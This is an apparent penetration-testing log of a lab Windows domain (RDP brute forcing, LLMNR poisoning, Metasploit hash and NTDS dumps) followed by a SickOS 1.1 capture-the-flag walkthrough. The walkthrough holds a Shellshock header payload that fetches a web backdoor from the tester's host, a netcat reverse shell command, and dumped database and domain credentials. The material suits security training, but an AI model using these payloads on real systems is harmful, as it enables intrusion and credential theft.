+ -- --=[Port 512 closed... skipping.
+ -- --=[Port 513 closed... skipping.
+ -- --=[Port 514 closed... skipping.
+ -- --=[Port 993 closed... skipping.
+ -- --=[Port 1433 closed... skipping.
+ -- --=[Port 1521 closed... skipping.
+ -- --=[Port 3306 closed... skipping.
+ -- --=[Port 3389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] max 30 tasks per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~0 tries per task
[DATA] attacking service rdp on port 3389
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 18446744073709551488 todo in 5124095576030430:60h, 30 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
+ -- --=[Port 5432 closed... skipping.
+ -- --=[Port 5900 closed... skipping.
+ -- --=[Port 5901 closed... skipping.
+ -- --=[Port 8000 closed... skipping.
+ -- --=[Port 8080 closed... skipping.
+ -- --=[Port 8100 closed... skipping.
+ -- --=[Port 6667 closed... skipping.
################################### Done! ###########################################
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: ALL
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded: function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF
NBT-NS Answer sent to: 192.168.1.146. The requested name was : TEST-3F6416AC49
NBT-NS Answer sent to: 192.168.1.138. The requested name was : TEST-3F6416AC49
LLMNR poisoned answer sent to this IP: 192.168.1.138. The requested name was : TEST-3F6416AC49.
NBT-NS Answer sent to: 192.168.1.138. The requested name was : BUENOSAIRES
LLMNR poisoned answer sent to this IP: 192.168.1.138. The requested name was : BUENOSAIRES.
NBT-NS Answer sent to: 192.168.1.129. The requested name was : XEROSECURITY
+]SMB-NTLMv1 hash captured from : 192.168.1.129
[+]SMB complete hash is : Administrator::XEROSECURITY:2E648C1D752DE4B100000000000000000000000000000000:D08EBBB84EF4F24EAACF2F5A077FD2C91E22C1A3722C4EB9:1122334455667788
Password:
---------------------------------------------------------------------
CredCrack v1.0 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Validating 192.168.1.129
[*] Validating 192.168.1.138
-----------------------------------------------------------------
192.168.1.129 - Windows 5.1
-----------------------------------------------------------------
OPEN \\192.168.1.129\C
OPEN \\192.168.1.129\Downloads
OPEN \\192.168.1.129\ADMIN$
OPEN \\192.168.1.129\C$
-----------------------------------------------------------------
192.168.1.138 - Windows Server 2012 R2 Datacenter 9600
-----------------------------------------------------------------
OPEN \\192.168.1.138\ADMIN$
CLOSED \\192.168.1.138\C
OPEN \\192.168.1.138\C$
OPEN \\192.168.1.138\Desktop
OPEN \\192.168.1.138\NETLOGON
OPEN \\192.168.1.138\SYSVOL
[*] Done! Completed in 0.2s
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_ad_computers resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
Domain Computers
================
dNSHostName distinguishedName description operatingSystem operatingSystemServicePack
----------- ----------------- ----------- --------------- --------------------------
WIN-8MSB2DD52P9.xerosecurity.com CN=WIN-8MSB2DD52P9,OU=Domain Controllers,DC=xerosecurity,DC=com Windows Server 2012 R2 Datacenter
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/smart_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running module against WIN-8MSB2DD52P9
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf5/loot/20160131194836_default_192.168.1.138_windows.hashes_919916.txt
[+] This host is a Domain Controller!
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2b77d7cda13b836d669bea8ebbdb6464
[+] user:1106:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] test3:1603:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] hacker:1604:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
[+] user-XP$:1104:aad3b435b51404eeaad3b435b51404ee:9874f93eb39548c31e655bc688c89064
[+] TEST-3F6416AC49$:1602:aad3b435b51404eeaad3b435b51404ee:a93c420761d5d783f1c3c674482e7d47
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/cachedump
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Executing module against WIN-8MSB2DD52P9
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[*] MSCACHE v2 saved in: /root/.msf5/loot/20160131194854_default_192.168.1.138_mscache2.creds_222028.txt
[*] John the Ripper format:
# mscash2
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_computers
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running module against WIN-8MSB2DD52P9
List of Domain Hosts for the primary Domain.
============================================
Domain Hostname IPs
------ -------- ---
XEROSECURITY TEST-3F6416AC49 192.168.1.129
XEROSECURITY WIN-8MSB2DD52P9 192.168.1.138
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/credentials/credential_collector
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running module against WIN-8MSB2DD52P9
[+] Collecting hashes...
Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: krbtgt:aad3b435b51404eeaad3b435b51404ee:2b77d7cda13b836d669bea8ebbdb6464
Extracted: user:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
Extracted: test3:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
Extracted: hacker:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665
Extracted: WIN-8MSB2DD52P9$:aad3b435b51404eeaad3b435b51404ee:58171b080def3d75833dcc4588956059
Extracted: user-XP$:aad3b435b51404eeaad3b435b51404ee:9874f93eb39548c31e655bc688c89064
Extracted: TEST-3F6416AC49$:aad3b435b51404eeaad3b435b51404ee:a93c420761d5d783f1c3c674482e7d47
[+] Collecting tokens...
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-2
XEROSECURITY\Administrator
NT AUTHORITY\ANONYMOUS LOGON
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_domain
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[+] FOUND Domain: xerosecurity
[+] FOUND Domain Controller: WIN-8MSB2DD52P9 (IP: 192.168.1.138)
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/manage/enable_rdp
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf5/loot/20160131195101_default_192.168.1.138_host.windows.cle_069757.txt
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/credentials/domain_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Volume Shadow Copy service not running. Starting it now...
[+] Volume Shadow Copy started successfully.
[*] Software Shadow Copy service not running. Starting it now...
[+] Software Shadow Copy started successfully.
[*] NTDS database copied to C:\Windows\Temp\XjxLdwoibp\Active Directory\ntds.dit
[*] Repairing NTDS database after copy...
[*]
Initiating REPAIR mode...
Database: C:\Windows\Temp\XjxLdwoibp\Active Directory\ntds.dit
Temp. Database: TEMPREPAIR160.EDB
Checking database integrity.
Scanning Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Integrity check successful.
Note:
It is recommended that you immediately perform a full backup
of this database. If you restore a backup made before the
repair, the database will be rolled back to the state
it was in at the time of that backup.
Operation completed successfully in 0.578 seconds.
[+] Administrator (Built-in account for administering the computer/domain)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
Password Expires: ay, January 1, 1601
Last Password Change: 7:31:09 PM Saturday, January 30, 2016
Last Logon: 12:42:59 AM Monday, February 1, 2016
Logon Count: 54
Hash History:
Administrator:500:FA3FB68C6EDB18CB7583C80994C8C089:B490B475E987909AE9BD83A65AA94665
Administrator:500:BCD82078CE35C7829DE997CC8916E980:D47A1AAB4276F8B2C8260D6080CB4A6A
Administrator:500:1D1D058C94FD4ACFFA49846759673AEE:B490B475E987909AE9BD83A65AA94665
[+] Guest (Built-in account for guest access to the computer/domain)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Password Expires: Never
Last Password Change: 12:00:00 AM Monday, January 1, 1601
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0
- Account Disabled
- Password Never Expires
- No Password Required
Hash History:
[+] krbtgt (Key Distribution Center Service Account)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2B77D7CDA13B836D669BEA8EBBDB6464
Password Expires: r
Last Password Change: 11:30:36 AM Saturday, July 4, 2015
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0
- Account Disabled
Hash History:
krbtgt:502:A2767649B8542D1D63AA332E6D42A321:2B77D7CDA13B836D669BEA8EBBDB6464
[+] user ()
user:1106:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
Password Expires: r
Last Password Change: 7:31:37 PM Saturday, January 30, 2016
Last Logon: 11:09:32 PM Saturday, January 30, 2016
Logon Count: 5
- Password Never Expires
Hash History:
user:1106:CA57574CC11A255FD2EBD16BFCD3B45F:B490B475E987909AE9BD83A65AA94665
user:1106:C3E26BFE0F884EDBCA0FDE2816978F2B:B490B475E987909AE9BD83A65AA94665
[+] test3 ()
test3:1603:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
Password Expires: ay, January 1, 1601
Last Password Change: 7:16:30 PM Sunday, January 31, 2016
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0
Hash History:
test3:1603:7D03E2B0385244D8FA5FD08D4CBCD034:B490B475E987909AE9BD83A65AA94665
[+] hacker ()
hacker:1604:aad3b435b51404eeaad3b435b51404ee:B490B475E987909AE9BD83A65AA94665
Password Expires: ay, January 1, 1601
Last Password Change: 8:40:50 PM Sunday, January 31, 2016
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0
Hash History:
hacker:1604:D14E9C2FA1F1498C5CD4B1C2F6851AEE:B490B475E987909AE9BD83A65AA94665
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_patches
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/manage/nbd_server
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: DEVICE.
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/credentials/idm
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Looking at Key S-1-5-21-1088676282-494858925-2056655024-500
[*] IDM not installed for this user.
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> use post/windows/gather/enum_shares
resource (/pentest/windows/metasploit-windows-post-exploitation.rc)> run
[*] Running against session 3
[*] The following shares were found:
[*] Name: SYSVOL
[*] Path: C:\Windows\SYSVOL\sysvol
[*] Type: 0
[*]
[*] Name: NETLOGON
[*] Path: C:\Windows\SYSVOL\sysvol\xerosecurity.com\SCRIPTS
[*] Type: 0
[*]
[*] Name: Desktop
[*] Path: C:\Users\Administrator\Desktop
[*] Type: 0
[*]
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation2.rc)> use post/windows/gather/hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation2.rc)> run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3d33c6ea71133396933c08a0326e1da9...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt
Tester(s)...: h1tch1
Twitter.....: https://twitter.com/D4rk36
DESCRIPTION
This is a quick walk through/solution for SickOS v1.1 which can be downloaded below. Despite there being several write ups for this challenge, I decided to post my own methods of attack and share my mindset going through this challenge in hopes that it may help others.
# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts 7 Captured ARP Req/Rep packets, from 7 hosts. Total size: 402 _____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.122 00:0c:29:16:91:9d 01 042 VMware, Inc.
ENUMERATION
Now that we have the IP address of our new VM, we can start enumerating open ports/services to determine our plan of attack. For this phase, I always rely on “Sn1per” which can be downloaded here: https://github.com/1N3/Sn1per
# ./sniper 192.168.1.0/24
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.5 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 122.1.168.192.in-addr.arpa: NXDOMAIN
Host 122.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.122 (192.168.1.122) 56(84) bytes of data.
--- 192.168.1.122 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:27 EST
Nmap scan report for 192.168.1.122
Host is up (0.00028s latency).
Not shown: 65532 filtered ports, 1 closed port
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:16:91:9D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms 192.168.1.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.27 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:28 EST
Nmap scan report for 192.168.1.122
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp open|filtered snmptrap
389/udp open|filtered ldap
520/udp open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:16:91:9D (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 192.168.1.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.01 seconds
################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 opened... running tests...
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:31 EST
Nmap scan report for 192.168.1.122
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:16:91:9D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds
PLAN OF ATTACK
Now that we’ve enumerated all open ports and services, we can see that our only options for attack vectors are: 1) Exploiting or brute forcing SSH
2) Attempting to connect to the Squid open proxy server to pivot off of Since our brute force of common usernames and passwords already failed and there doesn’t seem to be any known exploits for this version of SSH, our only option seems to be to leverage the proxy and see what else we can find. To do this, I used Burpsuite proxy and added upstream proxies back to the SickOS IP address: After Burpsuite is configured, we can now browse to the IP address via a web browser connected to Burpsuite in order to connect to local ports that may be open locally on the box. As we can see below, the root of the web server can be reached locally and contains the following code:
GET http://192.168.1.122/ HTTP/1.1
Host: 192.168.1.122
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3pqr9365an8p7rktmep2hjauo2
HTTP/1.0 200 OK
Date: Sat, 02 Jan 2016 20:00:14 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.21
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: close
< h1 >
BLEHHH!!!
< /h1 >
Since there isn’t any linked content in the root web page, we’ll need to manually brute force files and directories in order to discover any hidden content. This can be done using Burpsuite or DirBuster or any other web content discovery methods. After some time, you should be able to discover a robots.txt page. This reveals some other web content that may be helpful to us.
ROBOTS.TXT
GET http://192.168.1.122/robots.txt HTTP/1.1
Host: 192.168.1.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.122/shell.php?act=sql&sql_login=root&[email protected]&sql_server=localhost&sql_port=3306&sql_db=mysql&sql_tbl=user
Cookie: PHPSESSID=3pqr9365an8p7rktmep2hjauo2
Connection: close
HTTP/1.0 200 OK
Date: Sat, 02 Jan 2016 19:58:29 GMT
Server: Apache/2.2.22 (Ubuntu)
Last-Modified: Sat, 05 Dec 2015 00:35:02 GMT
ETag: "40ca5-2d-5261bcb6b1d0f"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 45
Content-Type: text/plain
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: close
User-agent: *
Disallow: /
Dissalow: /wolfcms
After discovering the wolfcms site, I was unable to find any exploitable web vulnerabilities 🙁 However, in the process of my web content brute force, I did notice a /cgi-bin/ directory and decided to continue my brute force to enumerate any scripts here.
SHELLSHOCK EXPLOIT
After discovering /cgi-bin/status, I attempted to exploit Shellshock via Burpsuite using a method I previous blogged about here since Shellshock affected many cgi and perl programs.
GET http://192.168.1.122/cgi-bin/status HTTP/1.1
Host: 192.168.1.122
User-Agent: () { :;}; /bin/bash -c "wget http://192.168.1.149/c100.txt -O /var/www/shell.php"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET http://192.168.1.122/shell.php HTTP/1.1
Host: 192.168.1.122
User-Agent: test
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
After pulling down the backdoor script from my remote server, I now had a full remote web shell with command execution and SQL command execution. From here, I went through the normal routes of privilege escalation on Linux by gathering information from the target and re-assessing my attack vectors.
$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
NETCAT REVERSE SHELL
Even though I had a full remote web shell, I decided to spawn a netcat reverse shell for easier command line access.
$ nc -lvvp 31337 # ON LOCAL HOST
$ nc 192.168.1.149 31337 -e /bin/bash # ON REMOTE HOST
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
cat config.php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
define('TABLE_PREFIX', '');
MYSQL DATA DUMP
Now that I had the username/password for MySQL, I leveraged my web shell in order to gain access to the DB and dump the following creds.
use wolf; SELECT * FROM user;
id name email username password salt language last_login last_failure failure_count created_on updated_on created_by_id updated_by_id Action
1 Administrator [email protected] admin 3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f 6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167 en 2015-12-05 07:47:16 NULL 0 2015-12-05 06:25:06 2015-12-05 07:47:16 1 NULL Delete Edit
use mysql; SELECT * FROM user;
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Create_tmp_table_priv Lock_tables_priv Execute_priv Repl_slave_priv Repl_client_priv Create_view_priv Show_view_priv Create_routine_priv Alter_routine_priv Create_user_priv Event_priv Trigger_priv Create_tablespace_priv ssl_type ssl_cipher x509_issuer x509_subject max_questions max_updates max_connections max_user_connections plugin authentication_string Action
localhost root *A7A20B93EC076311A63BF86B5C705B25C054DD77 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y NULL NULL NULL NULL 0 0 0 0 NULL NULL Delete Edit
sickos root *A7A20B93EC076311A63BF86B5C705B25C054DD77 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y NULL NULL NULL NULL 0 0 0 0 NULL NULL Delete Edit
127.0.0.1 root *A7A20B93EC076311A63BF86B5C705B25C054DD77 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y NULL NULL NULL NULL 0 0 0 0 NULL NULL Delete Edit
::1 root *A7A20B93EC076311A63BF86B5C705B25C054DD77 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y NULL NULL NULL NULL 0 0 0 0 NULL NULL Delete Edit
localhost debian-sys-maint *CB98094782C386F2459D65D97B17D1DE15D1654B Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y N NULL NULL NULL NULL 0 0 0 0 NULL NULL Delete Edit
GAINING REMOTE SSH SHELL
Since I was able to enumerate all valid users (sickos) and some passwords ([email protected]), I decided to use this info to see if I could login via SSH and sure enough, this worked!
[email protected]:~# ssh [email protected][email protected]'s password:
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Jan 3 01:20:33 IST 2016
System load: 0.0 Processes: 117
Usage of /: 4.7% of 28.42GB Users logged in: 0
Memory usage: 11% IP address for eth0: 192.168.1.122
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
128 packages can be updated.
96 updates are security updates.
New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Sep 22 08:32:44 2015
[email protected]:~$
[email protected]:~$ cd /home
[email protected]:/home$ ls
sickos
[email protected]:/home$ cd sickos/
[email protected]:~$ ls
[email protected]:~$ ls -lah
total 32K
drwxr-xr-x 3 sickos sickos 4.0K Jan 3 01:21 .
drwxr-xr-x 3 root root 4.0K Sep 22 08:19 ..
-rw------- 1 sickos sickos 13 Sep 22 09:20 .bash_history
-rw-r--r-- 1 sickos sickos 220 Sep 22 08:19 .bash_logout
-rw-r--r-- 1 sickos sickos 3.5K Sep 22 08:19 .bashrc
drwx------ 2 sickos sickos 4.0K Sep 22 08:32 .cache
-rw------- 1 sickos sickos 28 Jan 3 01:21 .mysql_history
-rw-r--r-- 1 sickos sickos 675 Sep 22 08:19 .profile
[email protected]:~$ cat .bash_history | less
sudo su
GAME OVER
Now that I had a valid shell, one of the first things I tried was sudoing to “root”. Luckily it worked and from here, I now had full control of the server and could view the flag!